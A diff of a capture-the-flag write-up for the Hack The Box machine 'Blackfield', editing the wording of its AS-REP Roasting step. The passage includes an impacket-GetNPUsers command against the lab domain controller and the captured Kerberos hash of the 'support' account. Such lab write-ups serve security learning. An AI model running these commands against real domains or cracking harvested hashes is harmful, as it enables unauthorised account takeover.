Vorkharium/vorkharium.github.io/_posts/2024-11-03-HTB-Blackfield-Write-up.md

 [*] No passwords were discovered :'(
 ```

-This is great, we got 3 valid users and the user "support" has PreAuth (Pre-authentication) disabled.
-This means we can do an AS-REP Roast attack on the "support" account!
+This is great, we got 3 valid users and the user support has PreAuth (Pre-authentication) disabled.
+This means we can do an AS-REP Roast attack on the support account!

 # Foothold
 ## AS-REP Roasting on the "support" user
-We will use impacket-GetNPUsers to do an AS-REP Roasting attack on the "support" user:
+We will use impacket-GetNPUsers to do an AS-REP Roasting attack on the user support:
 ```shell
 impacket-GetNPUsers blackfield.local/support -dc-ip 10.129.191.43 -no-pass
 ```
-And... yes!
-We got the hash of the user "support"!
+We got the hash of the user support.
+Nice!
 ```shell
 $krb5asrep$23$support@BLACKFIELD.LOCAL:02ee82412322b915bcdb39d389965421$111f1e4dadd6ffc86b3ee321a04f97bb0aadc3131133f41f3ca3f73b2f1ad3ab044365d4eb6fc88ea48763211754afad019c3bfaec593590d5afc788fdbe59149711499ea858813522d28ee0da3714587af847a63b3903721f090e19073216599f1f6ba125a8adad5a9ba53edce69388be7fd3bb5aabf816511af83d93bce9e408963d61067cdaaefb62caba1d3a50a10aa5892da70a7cb5f9eaa225a3d1b818da389d603edf921000e21e8f18a12b1a905a7f3b4bbb55628d25747e6e0bcbbd2dcd60c630cc8e121b8052182a04b1681197a61a45a225c967a34d404f3e031e00a6a132eff0db70b68c2fc8eafb71600f5944ca
 ```